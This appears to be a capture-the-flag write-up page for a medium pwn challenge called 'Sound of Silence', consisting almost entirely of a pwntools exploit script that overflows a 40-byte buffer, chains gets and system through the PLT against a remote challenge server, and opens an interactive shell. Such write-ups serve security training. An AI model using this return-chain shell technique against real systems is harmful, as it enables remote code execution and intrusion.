Pwn - Sound of Silence
Medium
Description
Downloads
Solution





Last updated
Medium





Last updated
from pwn import *
exe = './sound_of_silence'
elf = context.binary = ELF(exe, checksec=False)
# context.log_level = 'debug'
offset = 40
# io = process(exe)
io = remote("94.237.63.93", 59792)
payload = b'A' * offset
payload += p64(elf.plt.gets)
payload += p64(elf.plt.system)
io.sendlineafter(b'>> ', payload)
io.sendline(b'/bin0sh')
io.interactive()